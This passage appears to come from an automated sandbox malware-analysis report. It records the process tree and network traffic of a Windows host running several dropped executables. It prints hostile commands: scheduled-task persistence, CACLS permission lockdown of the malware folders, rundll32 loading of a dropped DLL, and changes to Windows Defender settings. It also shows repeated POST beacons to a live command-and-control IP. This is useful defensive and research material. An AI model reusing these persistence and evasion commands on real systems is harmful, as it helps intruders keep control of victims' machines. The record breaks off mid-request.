    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16340348674855126687,6710257796245653226,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6428 /prefetch:1
    3⤵
    PID:5520
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16340348674855126687,6710257796245653226,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6420 /prefetch:1
    3⤵
    PID:3524
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,16340348674855126687,6710257796245653226,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7060 /prefetch:8
    3⤵
    PID:5984
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16340348674855126687,6710257796245653226,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2308 /prefetch:1
    3⤵
    PID:6016
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,16340348674855126687,6710257796245653226,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7060 /prefetch:8
    3⤵
    PID:5504

C:\Users\Admin\AppData\Local\Temp\5590.exe
C:\Users\Admin\AppData\Local\Temp\5590.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4432
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  PID:4396
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 260
  2⤵
  - Program crash
  PID:3588

C:\Users\Admin\AppData\Local\Temp\638B.exe
C:\Users\Admin\AppData\Local\Temp\638B.exe
1⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious use of AdjustPrivilegeToken
PID:1796

C:\Users\Admin\AppData\Local\Temp\6707.exe
C:\Users\Admin\AppData\Local\Temp\6707.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
PID:4620
- C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
  "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:4592
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
    3⤵
    - DcRat
    - Creates scheduled task(s)
    PID:5212
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
    3⤵
    PID:5292
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      4⤵
      PID:5948
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "explothe.exe" /P "Admin:N"
      4⤵
      PID:5992
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "explothe.exe" /P "Admin:R" /E
      4⤵
      PID:6020
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "..\fefffe8cea" /P "Admin:R" /E
      4⤵
      PID:6060
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "..\fefffe8cea" /P "Admin:N"
      4⤵
      PID:6048
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      4⤵
      PID:6036
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
    3⤵
    - Loads dropped DLL
    PID:6056

C:\Users\Admin\AppData\Local\Temp\7020.exe
C:\Users\Admin\AppData\Local\Temp\7020.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
PID:3580
- C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
  "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:5380
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
    3⤵
    - DcRat
    - Creates scheduled task(s)
    PID:5800
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit
    3⤵
    PID:5848
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      4⤵
      PID:1012
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "oneetx.exe" /P "Admin:N"
      4⤵
      PID:5364
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "oneetx.exe" /P "Admin:R" /E
      4⤵
      PID:1548
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      4⤵
      PID:5724
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "..\207aa4515d" /P "Admin:N"
      4⤵
      PID:5736
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "..\207aa4515d" /P "Admin:R" /E
      4⤵
      PID:5408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4432 -ip 4432
1⤵
PID:4116

C:\Users\Admin\AppData\Local\Temp\75BF.exe
C:\Users\Admin\AppData\Local\Temp\75BF.exe
1⤵
- Executes dropped EXE
PID:3320
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=75BF.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
  2⤵
  PID:6084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=75BF.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
  2⤵
  PID:5588
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9bd8146f8,0x7ff9bd814708,0x7ff9bd814718
    3⤵
    PID:5508

C:\Users\Admin\AppData\Local\Temp\7C48.exe
C:\Users\Admin\AppData\Local\Temp\7C48.exe
1⤵
- Executes dropped EXE
PID:1976

C:\Users\Admin\AppData\Local\Temp\809E.exe
C:\Users\Admin\AppData\Local\Temp\809E.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2520
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
  2⤵
  PID:5100

C:\Users\Admin\AppData\Local\Temp\8959.exe
C:\Users\Admin\AppData\Local\Temp\8959.exe
1⤵
- Executes dropped EXE
PID:3664

C:\Users\Admin\AppData\Local\Temp\8C58.exe
C:\Users\Admin\AppData\Local\Temp\8C58.exe
1⤵
- Executes dropped EXE
PID:2440

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1644

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9bd8146f8,0x7ff9bd814708,0x7ff9bd814718
1⤵
PID:6096

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
1⤵
- Executes dropped EXE
PID:3172

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
- Executes dropped EXE
PID:1936

C:\Users\Admin\AppData\Roaming\vcuasga
C:\Users\Admin\AppData\Roaming\vcuasga
1⤵
- Executes dropped EXE
PID:2800

C:\Windows\system32\rundll32.exe
C:\Windows\system32\rundll32.exe C:\Windows\system32\PcaSvc.dll,PcaPatchSdbTask
1⤵
PID:3460

C:\Users\Admin\AppData\Roaming\vcuasga
C:\Users\Admin\AppData\Roaming\vcuasga
1⤵
- Executes dropped EXE
PID:5300

Network

DNS

146.78.124.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

146.78.124.51.in-addr.arpa

IN PTR

Response
DNS

22.160.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

22.160.190.20.in-addr.arpa

IN PTR

Response
DNS

108.211.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

108.211.229.192.in-addr.arpa

IN PTR

Response
DNS

9.228.82.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

9.228.82.20.in-addr.arpa

IN PTR

Response
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

dual-a-0001.a-msedge.net

dual-a-0001.a-msedge.net

IN A

204.79.197.200

dual-a-0001.a-msedge.net

IN A

13.107.21.200
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301307_1ODPY4XEGGUMIF3D3&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301307_1ODPY4XEGGUMIF3D3&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 188125
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: ADAE5D7A0ECF4728A426BC090248896F Ref B: BRU30EDGE0807 Ref C: 2023-10-13T04:18:28Z
date: Fri, 13 Oct 2023 04:18:28 GMT
DNS

183.59.114.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

183.59.114.20.in-addr.arpa

IN PTR

Response
DNS

29.81.57.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

29.81.57.23.in-addr.arpa

IN PTR

Response

29.81.57.23.in-addr.arpa

IN PTR

a23-57-81-29deploystaticakamaitechnologiescom
DNS

18.31.95.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.31.95.13.in-addr.arpa

IN PTR

Response
DNS

55.36.223.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

55.36.223.20.in-addr.arpa

IN PTR

Response
DNS

1.208.79.178.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.208.79.178.in-addr.arpa

IN PTR

Response

1.208.79.178.in-addr.arpa

IN PTR

https-178-79-208-1amsllnwnet
DNS

208.194.73.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

208.194.73.20.in-addr.arpa

IN PTR

Response
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://rowviiqfe.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 161
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 13 Oct 2023 04:18:54 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://enbbd.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 195
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 13 Oct 2023 04:18:54 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://jxlyegicm.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 166
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 13 Oct 2023 04:18:55 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://eitpfns.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 249
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 13 Oct 2023 04:18:55 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://muqmdeyohi.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 299
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 13 Oct 2023 04:18:57 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://fdjhabvc.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 224
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 13 Oct 2023 04:18:57 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 41
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://dneeieli.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 175
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 13 Oct 2023 04:18:57 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://dkdlwp.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 272
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 13 Oct 2023 04:18:57 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://yarilidy.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 359
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 13 Oct 2023 04:19:01 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://wjjenr.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 119
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 13 Oct 2023 04:19:01 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://wuxwtjx.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 316
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 13 Oct 2023 04:19:02 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://foqinvgwoe.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 136
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 13 Oct 2023 04:19:02 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://nhrsvlmidv.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 236
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 13 Oct 2023 04:19:04 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://tgvis.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 185
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 13 Oct 2023 04:19:04 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 40
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ifxucsjrj.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 186
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 13 Oct 2023 04:19:05 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=86
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://gqybya.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 231
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 13 Oct 2023 04:19:05 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 45
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://yeunm.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 225
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 13 Oct 2023 04:19:07 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=84
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ilgswp.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 232
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 13 Oct 2023 04:19:07 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=83
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://birkiur.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 328
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 13 Oct 2023 04:19:08 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=82
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://sfpqdjp.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 343
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 13 Oct 2023 04:19:08 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 38
Keep-Alive: timeout=5, max=81
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://pwwjvvxuhq.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 264
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 13 Oct 2023 04:19:10 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://pylrbvwp.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 211
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 13 Oct 2023 04:19:11 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=79
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://pvphipu.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 352
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 13 Oct 2023 04:19:11 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=78
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://jldghgu.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 165
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 13 Oct 2023 04:19:11 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=77
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
